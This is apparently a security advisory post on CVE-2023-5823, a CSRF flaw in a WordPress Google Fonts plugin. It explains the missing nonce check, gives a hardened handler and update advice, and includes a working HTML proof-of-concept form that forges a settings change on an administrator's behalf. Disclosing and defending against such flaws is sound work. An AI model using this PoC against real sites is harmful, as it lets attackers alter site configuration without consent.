A recently disclosed Cross-Site Request Forgery (CSRF) vulnerability, designated CVE-2023-5823, affects ThemeKraft's TK Google Fonts GDPR Compliant plugin in versions up to and including 2.2.11. Because CSRF rides on the victim's existing session, the practical threat is an attacker tricking a logged-in administrator's browser into submitting a state-changing request to the plugin, thereby altering plugin settings on the affected WordPress site without the administrator's knowledge. In this post we walk through the vulnerability, a proof-of-concept page, and what you can do to fix the issue.

Vulnerability Details

Cross-Site Request Forgery (CSRF) is a class of flaw in which a web application accepts a state-changing request from an authenticated browser without verifying that the request was intentionally issued from the application's own pages. Since the browser attaches the session cookies automatically, a form or script on an attacker-controlled site can drive the victim's session. In the case of CVE-2023-5823, the TK Google Fonts GDPR Compliant plugin handles its settings form without a WordPress nonce check (or any equivalent origin check), so an attacker can cause a logged-in administrator to change the plugin's stored settings on the attacker's behalf.

The following code snippet illustrates the lack of CSRF validation:

<?php
// In file tk-google-fonts.php (vulnerable pattern)
function tk_google_fonts_admin_page_display() {
  if ( current_user_can( 'manage_options' ) ) {
    // No CSRF validation or nonce check: any POST that reaches this page with
    // the expected field name is accepted, regardless of where the form lived.
    if ( isset( $_POST['tk_google_fonts_action'] ) ) {
      // The raw POST value is also stored without sanitization.
      update_option( 'tk_google_fonts_action', $_POST['tk_google_fonts_action'] );
    }
  }
}

The capability check confirms who the user is, but nothing confirms where the request came from. An attacker can therefore host a page that submits this form, and the plugin's settings are altered as soon as a logged-in administrator's browser sends the request. Note that the raw POST value is also written to the option without sanitization.
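The same handler with the checks a plugin reviewer would expect, as an added example that is not the plugin's actual code. The function name and option name are taken from the snippet above; the nonce action and field names, the menu registration, the text domain and the page markup are assumptions made for this illustration:

```php
<?php
/**
 * Hardened settings handler (added example, not ThemeKraft's code).
 * Defends against CSRF with a per-user, per-action WordPress nonce and
 * sanitizes the submitted value before it is persisted.
 */

// Nonce action and field names: chosen for this example, not taken from the plugin.
const TKGF_NONCE_ACTION = 'tk_google_fonts_save_settings';
const TKGF_NONCE_FIELD  = '_tkgf_nonce';

// Register the page under admin.php?page=tk-google-fonts (slug assumed from the PoC URL).
add_action( 'admin_menu', function () {
    add_menu_page(
        'TK Google Fonts',                    // page title
        'TK Google Fonts',                    // menu title
        'manage_options',                     // capability required to see the page
        'tk-google-fonts',                    // menu slug
        'tk_google_fonts_admin_page_display'  // render/handle callback
    );
} );

function tk_google_fonts_admin_page_display() {
    // 1. Authorization: the capability check answers "who", and stays in place.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'tk-google-fonts' ), '', array( 'response' => 403 ) );
    }

    $is_post = isset( $_SERVER['REQUEST_METHOD'] ) && 'POST' === $_SERVER['REQUEST_METHOD'];

    // 2. Only mutate state on POST, and only after the nonce verifies.
    if ( $is_post && isset( $_POST['tk_google_fonts_action'] ) ) {
        // check_admin_referer() answers "where": it validates the token that
        // wp_nonce_field() embedded in the legitimate form and calls wp_die()
        // if it is missing or invalid. A page on another origin cannot read that
        // token, so a forged cross-site POST stops here.
        check_admin_referer( TKGF_NONCE_ACTION, TKGF_NONCE_FIELD );

        // 3. Sanitize before persisting. wp_unslash() removes the slashes WordPress
        //    adds to request data; sanitize_text_field() strips tags and control chars.
        $value = sanitize_text_field( wp_unslash( $_POST['tk_google_fonts_action'] ) );
        update_option( 'tk_google_fonts_action', $value );

        echo '<div class="notice notice-success"><p>' . esc_html__( 'Settings saved.', 'tk-google-fonts' ) . '</p></div>';
    }

    $current = get_option( 'tk_google_fonts_action', '' );
    ?>
    <div class="wrap">
        <h1>TK Google Fonts</h1>
        <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=tk-google-fonts' ) ); ?>">
            <?php wp_nonce_field( TKGF_NONCE_ACTION, TKGF_NONCE_FIELD ); ?>
            <label for="tk_google_fonts_action">Action</label>
            <input type="text" id="tk_google_fonts_action" name="tk_google_fonts_action"
                   value="<?php echo esc_attr( $current ); ?>" />
            <?php submit_button( esc_html__( 'Save', 'tk-google-fonts' ) ); ?>
        </form>
    </div>
    <?php
}
```

With this in place, the PoC form further down in this post is rejected by `check_admin_referer()` because it carries no valid `_tkgf_nonce` field. An equivalent fix with less hand-written code is to use the Settings API (`register_setting()` plus a form posting to `options.php`), which performs the nonce and capability checks itself; the explicit version above is shown because it maps one-to-one onto the vulnerable handler.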

Proof of Concept (PoC)

The following HTML code demonstrates how an attacker could create a malicious web page to exploit this vulnerability.

<!DOCTYPE html>
<html>
  <head>
    <title>CSRF POC</title>
  </head>
  <body>
    <h1>CVE-2023-5823 POC</h1>
    <form action="http://vulnerable-wp-site.com/wp-admin/admin.php?page=tk-google-fonts" method="POST">
      <input type="hidden" name="tk_google_fonts_action" value="malicious_value" />
      <input type="submit" value="Click me" />
    </form>
  </body>
</html>

When a user who is logged in to the target site with the manage_options capability (typically an administrator) clicks the "Click me" button, the browser sends a POST request to the vulnerable WordPress site with the user's session cookies attached, and the tk_google_fonts_action option is set to malicious_value without the user's consent. In a real attack the click is unnecessary: the same form can be submitted automatically by a script on page load. One caveat: browsers that default cookies to SameSite=Lax may decline to attach the WordPress authentication cookie to a cross-site top-level POST, which limits this PoC in some configurations, but that behaviour is not a substitute for a server-side nonce check.

Mitigation

To protect your WordPress site from this CSRF vulnerability, update the ThemeKraft TK Google Fonts GDPR Compliant plugin to a version later than 2.2.11, since every version up to and including 2.2.11 is affected. If no fixed release is available yet, deactivate the plugin until a patch has been released.

To check and update from the dashboard, open Plugins > Installed Plugins, confirm the version shown for TK Google Fonts GDPR Compliant, and click "Update now" if an update is offered.

You can also follow the official ThemeKraft website and WordPress plugin repository pages to stay updated on any future patches and announcements.

- ThemeKraft Website: https://www.themekraft.com/
- WordPress Plugin Repository: https://wordpress.org/plugins/gdpr-google-fonts/

Conclusion

CVE-2023-5823 is a reminder that keeping WordPress plugins and themes up to date is a baseline control, and that even a "cosmetic" plugin can expose an administrator's session if its settings handler skips nonce verification. This CSRF flaw lets an attacker change the plugin's settings through an administrator's browser. Updating the ThemeKraft TK Google Fonts GDPR Compliant plugin to a fixed release, or deactivating it until one exists, and following the vendor's announcements reduces your exposure to this class of attack.

Timeline

Published on: 11/06/2023 12:15:08 UTC
Last modified on: 11/14/2023 16:18:57 UTC